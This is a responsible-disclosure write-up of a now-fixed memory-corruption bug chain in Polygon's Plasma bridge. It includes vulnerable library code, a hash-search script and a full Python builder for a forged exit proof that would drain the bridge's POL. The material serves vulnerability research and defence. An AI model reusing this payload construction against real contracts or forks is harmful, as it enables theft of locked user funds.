Polygon Bridge Arbitrary Message Forging Using Memory Corruption

Key impact:

No prerequisites or requirements
Single transaction with malicious proof
$800m POL at risk at time of reporting

This is a disclosure of a vulnerability in the Polygon Plasma bridge. The vulnerability has been fixed since July 2024 and the fix has been pushed to the vulnerable library as well.

The Polygon Plasma bridge uses the Merkle Patricia Trie of transaction receipts that is generated with every block to allow a user to prove an event was emitted on Polygon. In the case of POL, this is the Withdraw event that is only emitted when POL is burned by the user.

The first vulnerability was in the MPT proof library, where early stopping on an extension node was possible and the 32-byte hash inside of the extension node would be interpreted as an RLP-encoded transaction receipt.

Normally a hash would not properly parse into a transaction receipt, but a second vulnerability in the RLP parsing library could be exploited to have the parsing go out-of-bounds into unallocated memory for some hashes.

By engineering the requirements of finding such a hash, it turned out to be of low complexity and by searching the Polygon chain history several were found that could be used to exploit the RLP bug.

The unallocated memory could be filled with controllable data because of the external call to the MPT verifier. Solidity will fill the memory with the calldata but later decrease the free memory pointer to unallocate said memory.

The RLP parsing for the transaction receipt would jump into this memory and by calculating the exact offsets, the receipt could be fully controlled after the proof.

This means that it was possible to prove that any arbitrary event happened on the Polygon chain, including a Withdraw event for the full amount that was in the Polygon bridge.

[Ppb x Gld]

[Fig. 01]

Polygon Bridge

The Polygon network employs multiple bridges, such as the PoS bridge, Plasma bridge, FxPortal and the zkEVM bridge. The first three work in a similar manner, using proofs of transaction receipts, but have slightly different use cases. We'll dive deeper into how this works, proving a transaction, and provide you with the required knowledge to understand the bug and exploit. The final exploit was only applicable to the Plasma bridge (https://etherscan.io/address/0x401F6c983eA34274ec46f84D70b31C151321188b), which is the bridge that held all locked POL between Ethereum and Polygon PoS.

The Plasma Bridge

The Polygon Plasma bridge was the first bridge and it was originally meant to be a true Plasma bridge with exit transactions, state proofs and more. The code for this can be found here: https://github.com/maticnetwork/contracts/blob/main/contracts/root/predicates/ERC20Predicate.sol.

However, Plasma is costly and complex, and so it was discontinued for a simpler model that is almost the same as the PoS bridge: proving transaction receipts. The code that is actually active can be found here: https://github.com/maticnetwork/contracts/blob/main/contracts/root/predicates/ERC20PredicateBurnOnly.sol, which are the 'burn only' predicates.

This diagram shows a simplified version of the Plasma bridge. It employs a DepositManager, where users can deposit their POL and it acts as an escrow. The WithdrawManager is responsible for verification of proofs, as well as keeping an exit queue. This exit queue would have been used more if Plasma was used, but it’s currently just a queue with a waiting time of 1 block. This means that you can nearly immediately process your exit NFT after exiting. Finally, there is the predicate contract and there is a type for each token type: ERC20, ERC721 and ERC1155. In the case of the Polygon Plasma bridge, only the ERC20PredicateBurnOnly is used with the ERC20 POL.

The exit function of the predicate looks complex, but it’s actually quite simple. The user has to provide a proof that the Withdraw event was emitted by the token on the Polygon PoS chain. The event contains the receiver and amount of tokens to be released.

Polygon PoS is also an EVM chain (a fork of geth) and so the same data structures are used as Ethereum. More specifically, the events that happened during a transaction are stored in the transaction receipt, which is part of the blockchain. The transaction receipt is stored in a Merkle Patricia Trie, a special trie that is used for encoding data and generating a root hash that can be used to prove the existence of data inside the trie.

Of course, the user needs to have something to prove against: the receipt root hash. This hash is part of a block and so the user also provides a block proof using a normal Merkle proof that the block hash is included in a checkpoint. This checkpoint is not part of the Ethereum specification, but a simple aggregation of block data on Polygon’s side.

On Ethereum mainnet, there is the RootChain contract (https://github.com/maticnetwork/contracts/blob/main/contracts/root/RootChain.sol) where validators of the Polygon network can submit checkpoints and signatures. Once committed, the checkpoint hash and the data it proves becomes part of the Polygon PoS history. These hashes contain all data of the Polygon PoS chain, not just those Withdraw events.

The Ethereum protocol makes heavy use of Merkle Patricia tries and RLP. For the sake of this article, we assume that you are familiar with both, but you can read more about them here:

Proving an event

With this prerequisite knowledge, we will dive a bit deeper into how Polygon exactly proved the existence of an event in the chain history.

function startExitWithBurntTokens(bytes calldata data) external {
    ExitPayloadReader.ExitPayload memory payload = data.toExitPayload();
    ExitPayloadReader.Receipt memory receipt = payload.getReceipt();
    uint256 logIndex = payload.getReceiptLogIndex();
    require(logIndex < MAX_LOGS, "Supporting a max of 10 logs");
    uint256 age = withdrawManager.verifyInclusion(
        data,
        0, /* offset */
        false /* verifyTxInclusion */
    );
    ExitPayloadReader.Log memory log = receipt.getLog();

    // "address" (contract address that emitted the log) field in the receipt
    address childToken = log.getEmitter();
    ExitPayloadReader.LogTopics memory topics = log.getTopics();
    // now, inputItems[i] refers to i-th (0-based) topic in the topics array
    // event Withdraw(address indexed token, address indexed from, uint256 amountOrTokenId, uint256 input1, uint256 output1)
    require(
        bytes32(topics.getField(0).toUint()) == WITHDRAW_EVENT_SIG,
        "Not a withdraw event signature"
    );
    require(
        msg.sender == address(topics.getField(2).toUint()), // from
        "Withdrawer and burn exit tx do not match"
    );
    address rootToken = address(topics.getField(1).toUint());
    uint256 exitAmount = BytesLib.toUint(log.getData(), 0); // amountOrTokenId
    withdrawManager.addExitToQueue(
        msg.sender,
        childToken,
        rootToken,
        exitAmount,
        bytes32(0x0),
        true, /* isRegularExit */
        age << 1
    );
}

View on Github

Looking at the exit function of the ERC20PredicateBurnOnly, we can see that the provided data is first parsed into an ExitPayload using the ExitPayloadReader library. This library simply makes use of the RLPReader library to parse RLP elements into named fields of a struct. This can be viewed here: https://github.com/maticnetwork/contracts/blob/main/contracts/common/lib/ExitPayloadReader.sol. This ExitPayload is a custom defined struct and it contains the necessary parameters for proving, such as the receipt root hash.

Then on further lines, the actual receipt is extracted, as well as its logs and the chosen log index’s topics. The topic has to match the Withdraw event signature and the emitter of the event has to be the correct child token or it will revert. The predicate delegates the verification of the proof to the WithdrawManager using the verifyInclusion function.

In the verification function (https://github.com/maticnetwork/contracts/blob/eef53596046eda70a53653a8e5ff79b1cbf0a4f9/contracts/root/withdrawManager/WithdrawManager.sol#L96-L160) we can see that it uses the MerklePatriciaProof library to verify the transaction receipt against the receipt root hash and afterwards the receipt root hash is proved against the checkpoint hash.

Vulnerabilities

Now that we better understand the Polygon Plasma bridge and how it allows users to submit MPT proofs, we can dive into the actual vulnerabilities.

MerklePatriciaProof

The first vulnerability of this chain was found in the MerklePatriciaProof verification library: https://github.com/maticnetwork/contracts/blob/main/contracts/common/lib/MerklePatriciaProof.sol

Proving data against an MPT root hash, requires providing the nodes and path in the trie. The receipt would be at the RLP-encoded version of its transaction index. For example, in a block, the transaction with index 273 would be placed into the branch with path 8-2-0-1-1-1, which is the RLP encoded version of 273: rlp(hex(273)) = rlp(0x0111) = 0x820111.

The nodes inside of an MPT trie have prefixes: 0 for even-length extension nodes, 1 for odd-length extension nodes, 2 for even-length leaf nodes and 3 for odd-length leaf nodes. This is crucial to verify, because it allows for distinguishing between extension nodes and leaf nodes. A user should only be able to proof data by traversing to a leaf node.

However, the MerkelPatriciaProof library allowed for early stopping on an extension node by simply providing a shorter proof path. In the example given above, the trie would contain branch nodes for nibble 8 and 2, then an extension node for nibbles 0-1 and finally branch nodes for nibble 1 and 1.

The exit payload's 9th parameter is the path that the MerklePatriciaProof should take and by taking out the last byte (nibbles 1-1), this proving would terminate earlier after traversing the extension node:

                if (pathPtr + traversed == path.length) {
                    //leaf node
                    if (
                        keccak256(RLPReader.toBytes(currentNodeList[1])) ==
                        keccak256(value)
                    ) {
                        return true;
                    } else {
                        return false;
                    }
                }

View on Github

In the extension node, the path is in currentNodeList[0], while the hash of the next branch node is in currentNodeList[1]. So by stopping early, you can input the hash inside of value and the proof would succeed.

Here, the value is a parameter freely chosen by the caller as the 7th parameter in the exit payload. Normally this is the RLP-encoded transaction receipt, but by specifying the internal hash inside of the extension node and leaving out the last 2 nibbles, we can terminate on the extension node hash as value.

This is not exploitable directly by itself, because a hash is random and only 32-bytes, so it can never be correctly parsed into an entire transaction. That’s why we need another bug.

RLPReader

The second bug is a bug inside of the RLPReader library.

    function toList(RLPItem memory item) internal pure returns (RLPItem[] memory) {
        require(isList(item));

        uint256 items = numItems(item);
        RLPItem[] memory result = new RLPItem[](items);

        uint256 memPtr = item.memPtr + _payloadOffset(item.memPtr);
        uint256 dataLen;
        for (uint256 i = 0; i < items; i++) {
            dataLen = _itemLength(memPtr);
            result[i] = RLPItem(dataLen, memPtr);
            memPtr = memPtr + dataLen;
        }

        require(memPtr - item.memPtr == item.len);

        return result;
    }

View on Github

More specifically, the function that parses an RLPItem into a list of RLPItems. Try to spot it for yourself before continuing! Here is the full source: https://github.com/hamdiallam/Solidity-RLP/blob/master/contracts/RLPReader.sol

Indeed, the last RLPItem of the list can be made to go out-of-bounds of the parent RLPItem. In this library, an RLPItem is simply a pointer and a length, which both point to a section in the EVM memory. This is separate from Solidity’s memory allocation, but of course they both use the same chunk of memory.

The problem here is that the library directly trusts the data length that is read using the _itemLength function. Each RLP element, either a string or list, has their length encoded, but that doesn’t mean it is necessarily correct!

So it trusts the length and parses this into an RLPItem, while increasing the memory pointer to loop over each element. As such, the last list element can overflow outside the bounds of the current RLPItem. This is because memPtr + dataLen can be greater than item.memPtr + item.length for the last element, as the dataLen is retrieved from _itemLength and not checked. This is also not checked in numItems, which does the same loop here, except only counts the items.

Remember that we have a 32-byte hash as value here, so how can that ever be parsed?

Exploitation

Hash Parsing

To go from the bug to a working exploit, there are a couple of things that we need to get right. The first and most obvious one is getting the extension node hash to be parsed correctly as a receipt. Remember that a hash is a random 32-byte value, but we can ‘control’ a few bytes by bruteforcing one as long as the complexity is low enough to make it practically feasible.

It is possible to get a hash that does the following: parse into a receipt (which is just an RLP list of its elements), where the 4th element is the list of logs and go out-of-bounds. Then this Log list has 2 elements of which the first one is very large, pushing the second element to be read completely from memory outside of the ExitPayload.

If we follow the code from where the transaction receipt is parsed from an RLPItem to the Receipt struct, we can see that we have the following requirements:

The first read byte is popped if it's not a list (which is a simple < 0xc0 check) and if so, it increases the read offset. (https://github.com/maticnetwork/contracts/blob/eef53596046eda70a53653a8e5ff79b1cbf0a4f9/contracts/common/lib/ExitPayloadReader.sol#L97)
The second read needs to check whether it is a list because now .toList() is called on it, afterwards it increases the offset with any encoded length. (https://github.com/maticnetwork/contracts/blob/eef53596046eda70a53653a8e5ff79b1cbf0a4f9/contracts/common/lib/ExitPayloadReader.sol#L95-L108)
The third, fourth and fifth reads can be anything, as long as the offset does not increase over 27 (leaving space in the 32 bytes of the hash for the other key elements). These 3 are the first 3 elements of the list, these are ignored as the 4th element is the log and accessed directly in data[3] (https://github.com/maticnetwork/contracts/blob/eef53596046eda70a53653a8e5ff79b1cbf0a4f9/contracts/common/lib/ExitPayloadReader.sol#L145)
The sixth read needs to be the long list that facilitates the jump and is what will be parsed into the log of the receipt. In the code we see that .toList() is called and then indexed using receipt.logIndex, which is separately chosen by the attacker (https://github.com/maticnetwork/contracts/blob/eef53596046eda70a53653a8e5ff79b1cbf0a4f9/contracts/common/lib/ExitPayloadReader.sol#L145). A list check and minimum length check is sufficient.
The final read is what eventually will be parsed as the log and we want to make it the buffer that catapults the next element into unallocated memory. This can be a long string or long list and a minimum length requirement as well as a maximum length requirement (because we need to send those 0's as calldata). By choosing the receipt.logIndex = 1, we can skip this large element and parse the next one as the actual Log, which is taken from unallocated (but filled) memory.

Hash Hunting

Now that we know the requirements for a hash to work, we can work on finding one in the entire chain history of the Polygon PoS chain.

def check_hash(h):
    data = bytes.fromhex(h) + 32 * b'\\x00'
    offset = 0

    # 1.
    if data[offset] < 0xc0:
        offset += 1

    # 2.
    if data[offset] < 0xc0:
        return False
    offset += get_offset(data[offset])

    # 3.
    for _ in range(3):
        offset += get_length(data[offset:])
        if offset > 27:
            return False

    # 4.
    log_len = get_length(data[offset:])
    if data[offset] < 0xf9 or log_len < 0x800:
        return False
    offset += get_offset(data[offset])
    if offset > 30:
        return False

    # 5.
    if data[offset] < 0xb9 or (data[offset] >= 0xc0 and data[offset] < 0xf9):
        return False
    buffer_len = get_length(data[offset:])
    if buffer_len > (log_len - 3) or buffer_len < 0x800 or buffer_len > 0xfffff:
        return False

    return True

View on Github

Here are the requirements converted to a Python script so we can programmatically look for a hash that works and gives us the ability to prove a value in unallocated memory. We can use this in two ways:

Bruteforce the event values such that an eligible hash is generated inside of the Merkle Patricia trie of the receipt in that block. This would require precisely emitting the right event with the right parameters.
Search the whole chain history for extension node hashes that are eligible.

The first way sounds easier, but it can be difficult to set up. It is possible, but because Polygon PoS has default events FeeTransfer events on each transaction, you would need to control the transaction in a full block. There are plenty of techniques that can make it possible, but the second way is much easier.

If you calculate the complexity of the requirements, you find that it’s really not that high. And with Polygon PoS having 60+ million blocks, there would have to be at least one exploitable hash. And all you need is one.

To do this, I have built a script to find the blocks with a transaction count between 273 and 512, as these will have an extension node (with 0-1) at the path 8-2. The script will take those blocks and calculate part of the Merkle Patricia trie of the transaction receipts under the extension node to get the hash that will be inside of that extension node. Then it checks that hash using the requirements I discussed above.

Just as an example, in the block range 16m-17m, there were about 212k blocks that had a transaction count between 273 and 512. The hash checker script terminated quickly, as a hash was already found after a few 10k blocks.

The block that I found was block 17074251 (https://polygonscan.com/block/17074251) and the hash in the extension node of the receipt trie was 8cf8a384e97b4bf8c814e0be6e1c3573d267ffdf9b8ea8546ba5b5b9e5f2a205.

Let’s try to dissect this hash and see how it would be parsed:

8c -> This is less than 0xc0 and will be popped.
f8 a3 -> 0xf8 is the long list of 1-byte length, so 0xa3 will be its length. (The encoded length of list is ignored in RLPReader.toList, but the offset is still increased).
84 e97b4bf8 -> 0x84 is the short string of 4-byte length, so 0xe97b4bf8 is just the 4-byte string. (This is the 1st element of the receipt, contents are ignored).
c8 14e0be6e1c3573d2 -> 0xc8 is the short list of 8-byte length, so 0x14e0be6e1c3573d2 is just an 8-byte list. (This is the 2nd element of the receipt, contents are ignored).
67 -> 0x67 is just a single byte. (This is the 3rd element of the receipt, contents are ignored).
ff df9b8ea8546ba5b5 -> 0xff is the long list with 8-byte as encoded length. This is a very large element and will be parsed as the log (we can handle the large length using an end marker in the final payload).
b9 e5f2 -> 0xb9 is the long string of 2-byte length, so a 0xe5f2 = 58866 bytes element that is used for the jump into memory. We need a buffer of zeroes of almost the same size.
a205 -> rest bytes, ignored.

As you can see the hash will work perfectly and allow for proving a jump into unallocated memory!

Dirtying unallocated memory

The next problem we need to solve is how to get controllable data in unallocated memory such that we can control the values of the parsed Log struct.

The answer lies in why the ERC20PredicateBurnOnly is the only one affected by the bug and not the PoS bridge or the FxPortal. In the exit function of the predicate, you can see that the order is: parsing into receipt, calling the WithdrawManager to verify the proof, parsing into a log. The order here is very important, as the external call to the WithdrawManager allows us to fill the memory with dirty bytes.

When calling an external function of another contract, Solidity will use the CALL opcode under the hood. This opcode requires pointers to the EVM memory to specify the call’s parameter values. In this case, it’s the entire data bytes parameter that is forwarded, so it will load the whole thing into memory again. Finally, after the call, Solidity will un-allocate this memory by subtracting the size from the free memory pointer. However, it will NOT clear this memory and so it is considered dirty. Normally this is not a problem for Solidity, but when you’re using a library that also makes direct use of memory (cough cough, RLPReader), then things will get messy.

It is indeed as simple as just filling the memory with the right bytes at the right offset, such that the jump from the parsing lands exactly at the memory location where our controlled Log data is. This has to be calculated once beforehand and depends on the exact hash jump value. We can do this with a buffer of zero bytes.

Building The Exploit

Now that we have all the pieces, it is time to build the final exploit and string it all together.

We will build the malicious exit payload proof for the block and extension node hash mentioned earlier. Polygon has a neat API that we can use to get the real exit payload and we will use that as a base for ours. To get the payload for the last transaction in the block: https://proof-generator.polygon.technology/api/v1/matic/exit-payload/0x4b1c4cc63d0eabcdafef769e57ccf83aca44b36654158b41c98a9360c054e471?eventSignature=0x4dfe1bbbcf077ddc3e01291eea2d5c70c2b422b415d95645b9adcfd678cb1d63.

The exit payload we get back is for this transaction specifically, but we don't need to prove a specific transaction, instead we only need to prove up to the extension node. So we can simplify the exit payload by removing the last 2 proof elements from the MPT proof. We also need to shorten the MPT proof path and replace the 7th element of the exit payload (the transaction receipt) with the extension node hash. This is the value that is later passed to the MPT proof function, since now we need to prove the hash and not the transaction receipt.

The checkpoint header number, Merkle block proof, block number, block timestamp, transactions root and receipts root can all stay the same. The log index should be 1.

To correctly recalculate the RLP encoding length, we can just use some Python code (the values here are manually extracted from the exit payload API):

from rlp import encode

print(encode([
    0x09c18f00, # checkpoint header number
    bytes.fromhex( # Merkle proof for the block in the checkpoint
        '4a01e6469ac2b72c1f1ff8f1e6ef3a097d8be76103612117b4da280710760e57'
        'fd733856d8e14f5e7e80dddaa299da368f2e407f085c4383a1e8d4993434e210'
        'a76b353c813c506402fe06d6845fe25dae1fd079e77d6268ae0d659ada72fe9b'
        'a1c706894efa3a461f5f639786ab218297b9336b86fbe6cd1c1f8a8a46e56567'
        '5c950ffdbc87115c371ab36bc047465e71eb9e785c0a8ba7dfbde9116c3c57c9'
        'e93e2acf9ad7ac8d1a3c1fc161e25dcec5a16f5a54383c1775a5a95173940b2e'
        'cfe4eb135e3cbc26029d65a45a4d22798607e7abca14756e1cdaffc9e6ae4bb6'
        'dffadb374856e351304fb188df45d8e779b586fb8a995994ccfb356bb09754ab'
        'c14613ad75752d6b0d2e12e360915e89cf896d0863b685605b6226256261375c'
    ),
    0x0104884b, # block number
    0x60f6e2ff, # block timestamp
    bytes.fromhex( # Block transactions root
        '7554f1231705203d4267458996252844ffb831cc03a33c8abf790ab08e45eb63'
    ),
    bytes.fromhex( # Block receipt root
        'b0c00b94ddee17557e21363f2a743edcf8c7fcb4ca06e331fa617ece4e758e7a'
    ),
    bytes.fromhex( # Receipt (which is actually the extension node's hash)
        '8cf8a384e97b4bf8c814e0be6e1c3573d267ffdf9b8ea8546ba5b5b9e5f2a205'
    ),
    bytes.fromhex( # MPT proof to the extension node
        'f901ccf90131a0c04d1a2cfe8fdf067af18383c3455cbcc44c77435312104792'
        '9149a9145cfad8a068e5704bf5d951293b712f6d15affd737aabd7e6be7fff75'
        '1cd2fbcbb20b247aa083888ac83329b481bb389821748c9ec10a19d12507a44b'
        '3c0c26dca18bda04dca00d88cff9167ce051c7cc77b685350d47dd26eb637a50'
        'c9d64e24822029a8f653a05dbfd66b811a34ba30d72aa93ca7e3012f22171406'
        '5fb326857d23d4abe417c9a03fecc2ad9ba3c34cc8b3be67d1b4b1ff5623b9c9'
        '2e25d563d8081c137b8e990ba05e12ccf34caf0eeeea3f5b5e36fd494878685a'
        'f17715732b042e6e7d6534f7c2a0b26edfbfc6a0caf5ed26a0d27d6c51b600a3'
        '0748db98d7897d38420ed0ffb27ca0e286fd36ff52c20772c4db850c8f2d7efa'
        '443f492608723646853e4e6edbc5728080808080808080f871a0f033bac053f5'
        '280c7938cabd1addaf4573d2588eb3b1e6e6ad7d5cd7456bbfa5a0d496eb962f'
        'c6a3548b45a1ddc27d16db0fa1bebd45fec668fb13b5119bfbf26ca05a32a034'
        '0bcda816eb25c89449694bcffcf01295d4606caeb09c7f74f6baaa8c8080808080'
        '808080808080808080e4820001a08cf8a384e97b4bf8c814e0be6e1c3573d267'
        'ffdf9b8ea8546ba5b5b9e5f2a205'
    ),
    bytes.fromhex( # MPT proof path
        '008201'
    ),
    1, # Log index
    57049 * b'\\x00' + # Buffer to align the injected log with the jump
    encode([
        bytes.fromhex('0000000000000000000000000000000000001010'), # Emitter = MATIC on PoS
        [
            bytes.fromhex( # Withdraw event signature
                'ebff2602b3f468259e1e99f613fed6691f3a6526effe6ef3e768ba7ae7a36c4f'
            ),
            bytes.fromhex( # Root token (MATIC on mainnet)
                '0000000000000000000000007D1AfA7B718fb893dB30A3aBc0Cfc608AaCfeBB0'
            ),
            bytes.fromhex( # Receiver (standard Forge contract address)
                '0000000000000000000000007FA9385bE102ac3EAc297483Dd6233D62b3e1496'
            )
        ],
        ( # Amount = MATIC balance of bridge at block 20550962
            1450861658108415095557765013
        ).to_bytes(32, 'big')
    ]) + \\
    b'\\xbf\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff' # End marker to stop the list parsing
]).hex())

View on Github

In the code, we see indeed that on the 7th element the hash 8cf8a384e97b4bf8c814e0be6e1c3573d267ffdf9b8ea8546ba5b5b9e5f2a205 is now placed. This hash is also included in the MPT proof in the final proof element (which is also the case for the real exit payload).

At the end of the normal exit payload (so after the log index), we see the things we need to add for the exploitation to work. This is a buffer of 57049 zeroes. This is due to the 0xb9e5f2 element that enables the jump but has an encoded length of 58866. We need only 57049 because the difference is going to be filled with the other bytes of the exit payload (the whole thing is loaded when making the external call), plus a few more bytes that were actually allocated in between.

The length of the buffer would vary depending on the hash but it is deterministic and is always the same for this hash and exploit, it does not depend on anything but a simple one-time calculation beforehand.

Then we add the injected log, which is a list containing the emitter, another list of topics and the log's data. The log’s data that we inject here is the address of the standard Forge test contract as receiver, and the total balance of POL of the bridge on mainnet.

Finally we need the end marker, which is 0xbfffffffffffffffff. This is a long RLP string with the largest length possible. It makes sure that the .toList() parsing stops and doesn't cause out-of-gas when it tries to parse the 0xffdf9b8ea8546ba5b5 long-list element of the hash. This is possible because it only reads the length, it never allocates all that memory.

Impact

All that’s left is to simply call the exit function of the predicate with the malicious exit payload proof.

The vulnerability chain would have allowed an attacker to prove any event with arbitrary values, such as a Withdraw event for the full POL balance of the bridge. It could drain the entire bridge of all TVL in a single transaction.

Disclosure

The vulnerabilities that were disclosed in this article, were previously disclosed to the Polygon security team in July 2024. They were fixed shortly after.

The first fix was the addition of a total length check of the RLP item length inside of the toList function of the RLPReader library: https://github.com/0xPolygon/pos-contracts/commit/1fc270710bce2b79b47817759e8631a9cc901642.

The second fix was the addition of prefix checks for the extension and leaf nodes of the MPT in the MerklePatriciaProof library: https://github.com/0xPolygon/pos-contracts/commit/679c7368a97d3b3a56f63d35fd83f4d8fa48ff2c.

Suggested and merged fix in the RLPReader library:

https://github.com/hamdiallam/Solidity-RLP/pull/28

Further research

The RLPReader library was an external repository and as expected, the same library has been used in other projects. So before disclosing the fix and the bug to the public, I’ve done extensive research into the usage of this library by other projects.

Using our scalable contract analysis tool called Glider (https://hexens.io/solutions/glider/) I was able to do blazingly fast static analysis using code pattern queries on all verified smart contracts on Ethereum mainnet and other chains. This led me to a list of projects that were using this library for RLP parsing.

I have manually reviewed each one and identified one case where the project contained the same vulnerability. It has been responsibly disclosed and fixed. The other projects were using the library in a different way, resulting in the bug not being exploitable.

After reading this write-up, it’s obvious that this bug is not arbitrarily exploitable and it heavily depends on how the project uses it. For example, in the case of the ERC20PredicateBurnOnly, it is only exploitable because the call to the MPT verification function happens in between the parsing of the receipt and the parsing of the log. This allows for filling the memory. Had this call been after the parsing, it would not have worked.

Polygon Bridge
The Plasma Bridge
Proving an event
Vulnerabilities
MerklePatriciaProof
RLPReader
Exploitation
Hash Parsing
Hash Hunting
Dirtying unallocated memory
Building The Exploit
Impact
Disclosure
Further research

Research

Tricking the Polygon bridge into withdrawals by forging transaction proofs

Polygon Bridge

The Plasma Bridge

Proving an event

Vulnerabilities

MerklePatriciaProof

RLPReader

Exploitation

Hash Parsing

Hash Hunting

Dirtying unallocated memory

Building The Exploit

Impact

Disclosure

Further research

Table of contents

Summary

In-depth technical details

Polygon Bridge

The Plasma Bridge

Proving an event

Vulnerabilities

MerklePatriciaProof

RLPReader

Exploitation

Hash Parsing

Hash Hunting

Dirtying unallocated memory

Building The Exploit

Impact

Disclosure

Further research

Table of contents